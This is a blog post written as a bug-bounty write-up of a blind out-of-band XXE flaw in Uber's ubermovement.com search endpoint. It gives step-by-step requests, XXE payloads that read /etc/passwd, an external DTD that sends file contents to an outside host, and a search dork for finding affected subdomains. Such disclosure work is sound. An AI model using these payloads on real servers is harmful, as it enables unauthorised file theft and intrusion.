Friday, 5 August 2016

Blind OOB XXE At UBER 26+ Domains Hacked.

XXE (XML External Entity) :
An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.

This is the story of how I was able to find XXE in one of the UBER'S Website that was in Bug Bounty Program Scope.

On July 26th 2016 Evening I was working on domain ubermovement Web Application.
As it was a small webapp there were no too much parameter to run injections tests. I started the old school tests and the first parameter I came across was the Search Box.


Now, I Attached my Burp Suite then gave a keyword to search and started monitoring the requests...

In Directory "search" I got two requests.
1.The Keyword I searched : http://ubermovement.com/api/search/GeneralSearch?crumb=ASmuamNBJiP4eyC3qpXZWu87i5X6PWGh&q=cat&p=0
2. http://ubermovement.com/api/search/GeneralSearch


Now , For the first request I started the attacks like XSS, SQL, XPATH, XXE, command injections many more.....

But they all failed and I didn't find any vulnerability.

Now I started my tests with second request...

As there were no parameters so, I Send the request to Repeater and started looking for Directory Based Vulnerabilities.

 
Then, As my all other Injection tests failed lastly I started looking for XXE.

So, First thing I does to change the Request Method to POST and check the response.



As the Response was same as GET Request so I Added the Content-type Header as application/xml
and basic XML Code with "GeneralSearch" as search parameter then checked for Response.
<?xml version="1.0" encoding="utf-8"?>
<GeneralSearch>cat</GeneralSearch>


The Response was shocking as I got the XML Error.

Now I was about 60% sure that it could lead to XXE. SO, I started the Blind Test for XXE...
with different payloads...
Eg.

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE dtgmlf6 [ <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<GeneralSearch>&xxe;</GeneralSearch>

But Still no luck all I was getting the XML Error in response....

Now, I thought lets check the vulnerability via OOB (Out-of-band) Method and perform a Ping Test.

So,
step-1 : I downloaded XAMPP and hosted a Apache Server.
step-2 : I Port forward my IP to port 80 so I can access my server via my Public IP from different networks.
step-3 : I Edited XXE Payload to :

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE dtgmlf6 [ <!ENTITY dtgmlf6ent SYSTEM "http://0.0.0.0/">
]>
<GeneralSearch>&dtgmlf6ent;</GeneralSearch> 

step-4 : Started the attack and got the error.


step-5 : I checked my server logs and I got a perfect ping from vulnerable application.




Now, the manual test confirms the vulnerability so I scanned the particular vulnerable request via Acunetix and it detected the vulnerability.


 
Then I Report the Bug First and then started doing further tests with .dtd payloads.

Its turn out to be the various sub-domain for .*ubermovement.com was having the same flaw.

Google Dork : site:ubermovement.com "/search/"



Original HackerOne Report #154096

Test Summary :

POST data was set to <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE dtgmlf6 [ <!ENTITY dtgmlf6ent SYSTEM "http://0.0.0.0/"> ]> <GeneralSearch>&dtgmlf6ent;</GeneralSearch>
An HTTP request was initiated for the domain http://0.0.0.0/ which indicates that this script is vulnerable to XXE injection.
NOTE : As it was Blind XXE Test I was Successful in Ping Test for XXE. But unable to retrieve any sensitive information.

HTTP request details:

IP address: 8.36.86.67
User agent: Java/1.8.0_60

Vulnerable Domain :

Vulnerable Link :

Vulnerable Parameter :

GeneralSearch

Steps To Reproduce :

  1. Go to website : http://ubermovement.com/
  2. Attach burp Suite & start intercepting now, click on search and search...
  3. Grab the GET request

    Eg. Original HTTP Request :

    GET /api/search/GeneralSearch HTTP/1.1
    Host: ubermovement.com
    Accept: /
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
  4. NOW,
Send request to repeater & change it to POST.

Eg. Original HTTP Request :

POST /api/search/GeneralSearch HTTP/1.1
Host: ubermovement.com
Content-Length: 173
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: /
  1. Now Add content type : Eg. Content-type: application/xml

Request will be:

POST /api/search/GeneralSearch HTTP/1.1
Content-type: application/xml
Host: ubermovement.com
Content-Length: 173
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: /
  1. Deploy web server and host "payload.dtd" File eg :

    payload.dtd :

    <?xml version="1.0" encoding="UTF-8"?>
    <!ENTITY % all "<!ENTITY send SYSTEM 'http://xxe.me/content?%file;'>">
    %all;
  2. Now Add XXE Payload For confirmation :
    <?xml version="1.0" encoding="utf-8"?>
    <!DOCTYPE roottag [ 
    <!ENTITY % file SYSTEM "file:///etc/passwd">
    <!ENTITY % dtd SYSTEM "http://0.0.0.0/payload23.dtd">
    %dtd;]>
    <GeneralSearch>&send;</GeneralSearch>

Request Will Be :

POST /api/search/GeneralSearch HTTP/1.1
Content-type: application/xml
Host: ubermovement.com
Content-Length: 214
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: /
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag [ 
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://0.0.0.0/payload.dtd">
%dtd;]>
<GeneralSearch>&send;</GeneralSearch>
NOTE : If you view your web server logs you will find a 404 error.

Getting started with AMF Flash Application Penetration Testing !

What is Action Message Format (AMF) ? TL;DR; AMF is a binary message serialization format geared for remote procedure calls, native to the...